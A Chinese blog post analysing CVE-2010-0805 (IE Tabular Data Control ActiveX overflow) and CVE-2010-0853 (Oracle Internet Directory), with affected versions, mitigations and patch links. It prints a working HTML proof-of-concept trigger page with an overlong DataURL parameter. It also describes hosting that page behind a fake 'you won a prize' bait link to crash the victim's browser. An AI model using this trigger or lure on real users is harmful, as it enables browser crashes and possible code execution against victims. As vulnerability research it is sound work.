cve漏洞分析:cve-2010-0805(附带测试代码) cve-2010-0853

最新推荐文章于 2024-05-23 21:25:20 发布
最新推荐文章于 2024-05-23 21:25:20 发布
阅读量3.7k 收藏 1
点赞数
文章标签: 2010 测试 microsoft oracle internet windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jo_say/article/details/5618525
版权

【警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负】

对象1:【附带攻击测试代码和效果演示】

1.      CVE编号cve-2010-0805

2.      微软漏洞编号ms10-018

3.      漏洞名称Microsoft IE Tabular Data Control ActiveX控件远程代码执行漏洞

4.      危害性:可执行远程特殊代码,溢出后获得当前用户权限

5.      危害等级:8

6.      涉及软件Microsoft IE

7.      受影响版本

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

相关windows系统:

windows_2000::SP4

windows_xp::sp1

windows_xp::sp2

windows_xp::sp3

8.      漏洞分析

Internet ExplorerWindows操作系统中默认捆绑的web浏览器。Internet ExplorerTabular Data Control ActiveX模块(tdc.ocx)中存在栈破坏漏洞。如果向CTDCCtl::SecurityCHeckDataURL函数传送了超长的DataURL参数,就可以触发这个漏洞,导致向任意内存位置写入单个NULL字节。攻击者可以通过构建特制的网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。

9.      临时解决方法:

l  Office中禁用ActiveX控件。

l  Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。

l  Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

l  不要打开意外的文件或者邮件。

10.  厂商补丁:

Microsoft已经为此发布了一个安全公告(MS10-018)以及相应补丁

MS10-018Cumulative Security Update for Internet Explorer (980182)链接:http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true

11.  攻击测试代码:

 

# CVE : CVE-2010-0805

<!--

.text:600058F7                 and     [ebp+pv], 0

.text:600058FE                 lea     eax, [ebp+pv]

.text:60005904                 push    eax             ; unsigned __int16 **

.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *

.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)

.text:6000590D                 mov     eax, [ebp+var_218]

.text:60005913                 push    [ebp+pv]        ; pv

.text:60005919                 mov     [ebp+eax+var_204], 0

.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param

.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address

-->

<html>

<title>Trigger for ZDI-10-034 by ZSploit.com</title>

<head>

</head>

<body>

<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">

<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>

</object>

</body>

</html>

测试代码演示

 

12.  效果演示:

a 搭建环境:

操作系统

1)      Windows xp::SP2 测试环境

2)      Windows 7 比较环境

IE版本

IE 6.0 / IE8.0

IIS

IIS5.0

虚拟机

Vmware 7

b 测试过程:(只给出可用性攻击)

l  VM7中装入Windows xp sp2,配置IIS环境。

l  把测试代码写入记事本,保存为任意名称的html文件,如attack.html

l  attack.html放入 C:/Inetpub/wwwroot目录下(iis的默认目录)

l  做一个普通的html文件price.html,作为诱饵,显示文本为:恭喜你,中奖了!让此文本链接指向attack.html.  

 

l  打开IE浏览器(IE6.0),访问http://localhost/price.html, 点击“ 恭喜你,中奖了!”。 IE崩溃,界面瞬间消失。系统日志记录为:

l  同上在windows7下搭建以上环境,点击诱饵后,IEIE8)将显示attack.html中的内容,没有出现问题。

 

对象2

1.      CVE编号cve-2010-0853

2.      漏洞名称:

Oracle Fusion Middleware CVE-2010-0853 Oracle Internet目录远程漏洞

3.      危害性:拒绝服务、远程代码执行

4.      危害等级:7

5.      涉及软件:Oracle

6.      受影响版本:

Oracle Oracle9i Standard Edition 9.2 .8DV

Oracle Oracle9i Standard Edition 9.2 .8

Oracle Oracle9i Personal Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8.0

Oracle Oracle Identity Management 10g 10.1.4 .0.1

Oracle Application Server 10.1.2.3

7.      漏洞分析:(此漏洞由oracle官方发布,对漏洞技术细节提及较少)

Oracle Fusion MiddlewareOracle 的中间件解决方案组合,用于协助开发、部署及管理SOA和其它应用程序。Oracle Fusion中间件所使用的Oracle Internet DirectoryPortal组件中存在安全漏洞,通过认证的远程用户可以通过LDAPHTTP协议来利用这些漏洞完全入侵数据库系统。

8.      厂商补丁:

Oracle已经为此发布了一个安全公告(cpuapr2010)以及相应补丁:

cpuapr2010Oracle Critical Patch Update Advisory - April 2010

链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html

 

 

 

 

 

 

 

jo_say
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Windows远程桌面服务漏洞CVE-2019-0708)复现测试
四维创智
09-19 6521
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
cve-2017-12617 tomcat远程代码执行漏洞复现测试
whatday的专栏
08-30 3440
0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12617:远程代码执行漏洞。 只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。发现并阻止上传Jav
CVE-2020-7982 OpenWrt 远程命令执行漏洞学习(完结)
最新发布
weixin_51339377的博客
05-23 1126
OpenWrt是一款应用于嵌入式设备如路由器等的Linux操作系统。类似于kali等linux系统中的apt-get等,该系统中下载应用使用的是opgk工具,其通过非加密的HTTP连接来下载应用。但是其下载的应用使用了SHA256sum哈希值来进行检验,所以将下载到的数据包进行哈希值的比对即可知道是否下载的数据包被修改,所以理论上来说是没有安全隐患的。
漏洞简述-漏洞分析实例是编号CVE-2006-3439
m0_64973256的博客
08-26 355
视频制作不易,求三联支持,拜谢~ +公众账号(极安御信安全研究院/北京极安御信安全研究院)报暗号:“资料” 即可领取视频相关工具、源码、学习资料,和其他逆向工程免费课。进交流群报暗号“交流群” ...
Microsoft Windows CredSSP 远程执行代码漏洞CVE-2018-0886
热门推荐
看着博客敲代码
04-16 3万+
Microsoft Windows CredSSP 远程执行代码漏洞 Microsoft Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1和RT 8.1,Windows Server 2012和R2,Windows 10 Gold,1511,1687,1703和1709中的凭证安全支持提供程序协议(CredSSP)Windows Server 2016由于CredSSP在身份验证过程中验证请求的方式(即“CredSSP远程执行代码漏洞”),17
IIS的FastCGI漏洞处理方法
主题模板站的博客
01-27 546
在服务器上根目录新建一个phpinfo()的JPG文件test.jpg,访问http://www.xxx.com/test.jpg/1.php(test.jpg后面的php名字随便写),如果有漏洞则可以看到phpinfo()的信息,反之会返回404错误。一般来说网上多是nginx用户有此漏洞,此处客户的环境是windows server 2008R2的IIS,这里我在‘处理程序映射’里找到php的双击进入此界面。这篇文章主要介绍了IIS的FastCGI漏洞处理方法,需要的朋友可以参考下。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
cve-search:cve-search-一种对已知漏洞执行本地搜索的工具
02-25
cve-search是一种工具,可将CVE(常见漏洞和披露)和CPE(通用平台枚举)导入MongoDB中,以方便CVE的搜索和处理。 该软件的主要目的是避免对公共CVE数据库进行直接和公共查找。 本地查询通常更快,您可以通过...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修复** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011-2232, CVE-2011-2238, CVE-2011-2239, CVE-2011-2242, CVE-2011-2243, CVE-2011-2244, CVE-2011-2248, CVE-2011-2253, CVE-2011-2257CVE-2011-0799 CVE-2011-0805 CVE-2009-3555 CVE-2011-0793, CVE-2011-0804, CVE-2011-0806 (Windows only)
iis解析漏洞
SUPER131110的博客
10-17 140
在iis服务管理添加模块映射。在网页打开1.php。
什么是CVE?常见漏洞和暴露列表概述
Trinity_Techologies的博客
05-18 1万+
常见漏洞和暴露(Common Vulnerability and Exposures,简称CVE)收集了已知的网络安全漏洞和暴露,以帮助您更好地保护您的嵌入式软件。 在这里,我们会阐释什么是CVECVE列表中包括哪些内容,以及它如何帮助确保您的软件是安全的。
IIS 7 HTTP.sys漏洞深入分析
weixin_33832340的博客
04-18 625
http.sys漏洞影响范围随着各方的深入分析,各地域受Windows HTTP.sys漏洞影响的情况正在逐渐浮出水面。昨天的通告信息中提到Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序,据绿盟科技互联网广谱平台数据显示,全球部署IIS的系统数量大概有444万余,从目前受影响的IIS各版本分布统计数据来看,其中IIS 7.5部署量最大,占比...
Spring框架标签EL表达式执行漏洞分析CVE-2011-2730)
weixin_33725270的博客
03-08 969
lupin · 2015/04/23 10:300x00 前言这个漏洞已经出来很久了,以前简单分析过,但是由于时间关系,没能深入研究原理,网上对这个漏洞分析也不太多,最近由于工作原因,深入分析了一下这个漏洞的原理,这里重点将漏洞调试过程,以及一些之前遇到的一些奇怪问题的原因记录下来。首先来看一下官方对这个漏洞的描述,如下图:可以看到,这个漏洞的形成,是因为在早于JSP2.0的版本上,由于没有EL...
如何查找oracle漏洞对应补丁号,Oracle 漏洞补丁如何查找下载并打补丁,什么漏洞都可用Opatch?...
weixin_33397740的博客
04-04 3521
我需要打这么多漏洞,有没有大师跟我 说如何处理比较好,是否是一个一个下载漏洞?序号 危险级别 漏洞编号 漏洞名称 返回信息12 高危险 009A071 Oracle数据库服务器Core RDBMS组件安全漏洞(CVE-2011-2239) Oracle Version:11.2.0.1....
动手实验 CVE-2010-3333 Microsoft RTF栈溢出漏洞
abelxu
02-13 3642
手把手分析CVE-2010-3333 RTF栈溢出漏洞,同时分析了msf如何生成通用性的exp
Nmap的漏洞利用脚本初探
夫君子之行,静以修身,俭以养德,非淡泊无以明志,非宁静无以致远.
01-13 4886
Nmap的漏洞利用脚本初探 made by tdcoming!1 1.概述   使用nmap进行扫描的时候,总会去结合者使用一些漏洞发现利用的脚本!但是呢,namp到底还有多少“秘密”!今天打算去研究一波,看看会不会舔到什么包,至少学习的路上不停的“跑毒”还是很有必要的! 2.开启脚本封印  正确的解开封印的姿势: cd /usr/share/nmap/scripts  #进入nma...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值